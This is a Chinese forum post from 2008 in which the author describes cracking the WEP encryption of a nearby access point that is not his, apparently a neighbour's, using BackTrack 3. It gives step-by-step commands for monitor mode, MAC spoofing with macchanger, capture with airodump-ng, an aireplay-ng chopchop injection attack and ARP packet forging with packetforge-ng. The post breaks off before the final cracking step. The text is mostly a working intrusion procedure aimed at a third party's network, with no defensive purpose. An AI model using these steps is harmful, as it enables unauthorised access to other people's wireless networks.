|
2星期前来到论坛学习破解技术,参考liyg、中卫大哥的教程,结合自己的实践终于在昨晚成功破解家附近的一个无客户端AP。在此感谢liyg、中卫大哥及帮助过我的所有大侠们。闲话少说,直接正题。 一,准备环境:DELL510M笔记本,自带INTEL2200BG网卡。BT3beta硬盘版。 二,启动BT3,输入root/toor进行,再输入xconf/startx进入图行界面。 三,打开一个shell窗口,输入ifconfig -a查看自己的网卡情况,从显示来看自己的网卡接口型号为eth1 四,输入airmon-ng start eth1 8 开启网卡的Monitor模式并工作在8频道(因为AP工作在8频道,可提前用airodump-ng eth1查看下AP的工作频道) 五,由于使用的是BT3的测试版,2200网卡需要打补丁,输入 modprobe ipw2200 rtap-iface=1
iwconfig eth1 key s:fakekey
iwconfig eth1 mode managed 补丁打好了 六,修改自己的网卡MAC,为了以后输入方便。输入macchanger -m 00:11:22:33:44:55 eth1回车,后又输入了一次ifconfig -a 查看了下网卡MAC已经更改为00:11:22:33:44:55。(也可以输入ifconfig eth1 up hw ether 00:11:22:33:44:55来修改自己的网卡mac)
七,输入airodump-ng --ivs -w name(自己随便起个名字) -c 8 eth1,开始查看AP的活动情况 八,由于AP没有合法的客户端,而且2200也不支持-1的虚拟连接,因此按照中卫的教程使用了-4命令。 输入aireplay-ng -4 -b AP的mac -h 001122334455 eth1,系统回显use this packet?时输入y回车,开始注入 九,一段时间后得到重要的*.xor文件
十,使用packetforge-ng命令提取xor文件里的prga并伪造arp包,输入packetforge-ng -0 -a AP的mac -h 001122334455 -k 255.255.255.255 -l 255.255.255.255 -y *.xor -w myrap(这里自己起个名字,我起的名字为myarp)回车,系统回显worte packet to:myarp | 
IP卡
狗仔卡
发表于 2008-7-27 21:43
提升卡
置顶卡
喧嚣卡
变色卡
抢沙发
千斤顶
显身卡
